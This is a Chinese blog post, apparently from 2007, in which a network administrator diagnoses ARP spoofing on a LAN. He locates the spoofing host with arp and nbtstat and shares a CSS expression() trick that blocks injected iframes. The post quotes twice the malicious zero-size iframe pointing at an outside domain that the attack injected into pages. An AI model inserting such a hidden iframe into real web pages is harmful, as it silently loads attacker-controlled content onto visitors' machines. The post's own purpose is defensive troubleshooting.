"<iframe src=http://34.baieweee.com/5.html width=0 height=0 frameborder=0></iframe>"
本来以为这个帧病毒,是“微软鼠标指针漏洞”的原因。篇一上了下写。断判的误,看来我是轻易下结论了,临下班的关机时间,给我带了错误的判断。写下了上一篇。http://birder.blueidea.com/archives/2007/4713.shtml
有强人说过,博客发表时要慎重,想好再发,但是既然发了就不能轻易删了。错误既然犯了,就留下做为警戒。以后发贴时,要验证清楚再按发送。
以下:正修是修正:
因为局域网感染流行病毒,总是比外网慢一拍,等啊等啊,终于等到传说中的"ARP欺骗",得以一窥其芳容。
连入局域网的用户,不断反映内部网页打不开,在排除其它因素之后,用记事本打开网页,查看源代码。
发现在底部多了一行代码"<iframe src=http://34.baieweee.com/5.html width=0 height=0 frameborder=0></iframe>"以为是WEB服务器中招出了问题,在本地查看其源码,并没有发现异常代码。很是奇怪,和网上说的不一样啊?!
也就是说服务器并没有感染,这就好办了,只是客户机有问题。
中午休息时间,报故障的机器来电话说正常了,又可以打开网页了,可我什么都没动呀,看来是是那台攻击的机器午休了。
到了下午上班时间,果然,故障又出现了,和预想的一样。
直接调出CDM,输入
arp -a
172.16.90.21 00-02-3f-e8-a3-38 dynamic172.16.90.104 00-02-3f-e8-a3-38 dynamic172.16.90.251 00-02-b3-13-ef-36 dynamic
看出来没有?因为90.21是我们网关,90.104居然和网关的MAC地址一样,双胞胎啊,是典型的ARP欺骗。
找到源头地址就好办了,接下来用 nbtstat -A 172.16.90.104 查找到机器名,定位到某科室办公用机。
接下来事情,就是通知该机用户,做杀毒,恢复系统处理。
至此,本次的“ARP欺骗”告一段落。
<style type="text/css" media="all" id="tt">/*<![CDATA[*/iframe{v:expression(this.src='about:blank',this.outerHTML='');/*使用IE Only 的样式会除所有 IFRAME */}#f126{v:expression() !important} //如果要使自己的IFRAME可以执行,在自己的IFRAME里加上ID="f126";/*]]>*/</style>
分析:前缀:expression(表达式);
这个前缀是可以随意更换的,我上面取名为"v",例如我可以换成:abc123:expression(this.src='about: blank',this.outerHTML=''); 挂木马的家伙得先看你的CSS里这个前缀,然后挂马的时候写成这样<iframe style="abc123:expression() !important" src="URL"></iframe>,那个前缀一定要是和你的网站一样的(abc123),才能挂到马,哈哈哈!如果把前缀做成动态的,就非常OK了,看你怎么挂!